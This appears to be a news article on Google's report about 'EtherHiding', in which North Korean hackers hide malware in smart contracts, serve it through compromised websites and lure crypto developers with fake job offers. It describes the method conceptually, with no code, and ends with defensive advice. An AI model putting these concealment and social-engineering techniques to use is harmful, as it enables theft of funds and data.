Google Threat Analysis Group has identified a new tactic by North Korean hackers associated with the DPRK for using public blockchain networks to spread malicious software. The method, known as EtherHiding, allows attackers to conceal malicious code in smart contracts, making it extremely hard to detect. This technique is actively combined with social engineering methods aimed at stealing cryptocurrency assets and confidential information from developers and specialists in the cryptocurrency field.
The EtherHiding method was first recorded in 2023 and has significantly evolved since then. Hackers, particularly the UNC5342 group, hack legitimate websites and embed JavaScript scripts into them. These scripts interact with specially prepared smart contracts in blockchain networks like BNB Smart Chain and Ethereum, where malicious code is stored.
A key feature of the technique is the use of 'read-only' functions that do not create transactions in the blockchain ledger. This approach allows attackers to avoid detection by monitoring systems completely and minimize transaction fee costs. When victims visit a compromised site, the malicious code is automatically activated, stealing cryptocurrency funds and confidential data.
North Korean hackers develop complex social engineering schemes by creating fake companies, recruiting agencies, and fake profiles on professional networks. The main targets are software developers and blockchain technology specialists.
Attackers send offers for high-paying jobs or invitations to prestigious interviews, moving communication to messengers like Discord and Telegram. During the so-called 'technical assessment' phase, victims are offered to complete a test task or download files from popular repositories like GitHub. These files contain malicious payload.
In other cases, hackers arrange video calls where a fake error message with a proposal to download a 'fix' is shown to the victim. Installed malware initiates a multi-stage attack: the second stage, called JADESNOW, steals data, and the third provides attackers with long-term access to the victim's device and connected networks.
EtherHiding poses particular danger to the cryptocurrency community as it exploits fundamental blockchain properties—immutability and decentralization—as a platform for storing and spreading malicious code. Smart contracts effectively turn into 'bulletproof' command and control servers.
Google Threat Intelligence Group emphasizes the need for increased vigilance by the crypto industry. It is recommended to meticulously verify the sources of job offers, avoid downloading files from unverified sources, and use modern cybersecurity tools. Organizations should implement multi-factor authentication and conduct regular employee training in recognizing phishing attacks.
Google's discovery demonstrates a new level of sophistication in cyberattacks by state actors. EtherHiding not only complicates the detection of malware but also sets a precedent for the use of blockchain technologies for criminal purposes. The crypto community will need to develop new methods of protection against such threats, including improved monitoring of smart contracts and analysis of suspicious interactions with blockchain networks.